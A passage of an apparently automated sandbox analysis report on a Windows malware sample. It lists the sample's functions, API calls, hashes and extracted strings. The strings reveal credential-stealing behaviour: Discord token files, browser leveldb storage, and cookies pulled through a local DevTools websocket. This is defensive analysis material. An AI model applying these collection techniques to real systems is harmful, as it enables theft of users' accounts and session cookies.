                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1238713047-0
                                                                                                                                                                                                                                                                          • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                          • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                          Function 004108E0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                          • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                          • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                          Function 00410CB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: GlobalMemoryStatusmemset
                                                                                                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                                                                                                          • API String ID: 790235955-2651807785
                                                                                                                                                                                                                                                                          • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                          • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                          Function 004116B0 Relevance: 3.1, APIs: 2, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateErrorHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2649838465-0
                                                                                                                                                                                                                                                                          • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                          • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                          Function 00411B80 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                          • Instruction ID: ca78cda8c920ae7da25bbd8c375dff46666a8013e4c9ac76a8aa62fa3564fd1b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B50184729096148BC300EF7CD94559EBBF0BB85725F014729ED94D7260E730AA99CBD3
                                                                                                                                                                                                                                                                          Function 00411CC0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 514040917-0
                                                                                                                                                                                                                                                                          • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                          • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                          Function 00411520 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                          • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                          • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                          Function 00411F50 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SHFileOperationA.SHELL32(?), ref: 00411F94
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                          • Opcode ID: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                          • Instruction ID: dccbb589212da41187320816474e935ed05e6db7b62261ff46e18f4692dac182
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CE07EB0608301ABE300DF46D55970BBBE0EB98308F40885DF0948B250D3B9C69C8B9B
                                                                                                                                                                                                                                                                          Function 004115B0 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                          • Opcode ID: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                          • Instruction ID: ab5a9e63b36d8a4e180a9fb52d0f1ced6ce58d3d562b5a6390f3396a209e36a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88219E31608A520FC73A4F3945D0BB6B752AF97245B0DC37FDA4507777DA2A48C54264

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 0041D3F0 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                          • Opcode ID: 42936b729b504c8ec363dc8e9866ebb1567e7e734c606f103ee9ac6311c9dd95
                                                                                                                                                                                                                                                                          • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42936b729b504c8ec363dc8e9866ebb1567e7e734c606f103ee9ac6311c9dd95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                          Function 0040D250 Relevance: 44.0, APIs: 29, Instructions: 450memorystringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                            • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1043663302-0
                                                                                                                                                                                                                                                                          • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                          • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                          Function 00406AA0 Relevance: 31.9, APIs: 13, Strings: 5, Instructions: 416COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                          • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                          • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                          • Opcode ID: 1e4706adc10695a6a7650f11896172624ac0887ad6bc57d91c858792225effed
                                                                                                                                                                                                                                                                          • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e4706adc10695a6a7650f11896172624ac0887ad6bc57d91c858792225effed
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                          Function 00415700 Relevance: 28.5, APIs: 7, Strings: 9, Instructions: 493stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpstrlen$??3@memmove
                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                          • API String ID: 429537097-599946814
                                                                                                                                                                                                                                                                          • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                          • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                          Function 0041D0C0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                          • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                          • Opcode ID: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                          • Instruction ID: 393e261fe4cb7b69f2f042267bc96a23e416e0ea17d9edbe6cd76d0812bafa5d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11BFB0B416227B9B325B745C48FEB6BE8AF15B40B990037F401E2171EB5CD8C286AD
                                                                                                                                                                                                                                                                          Function 00401090 Relevance: 27.1, APIs: 18, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004010A8
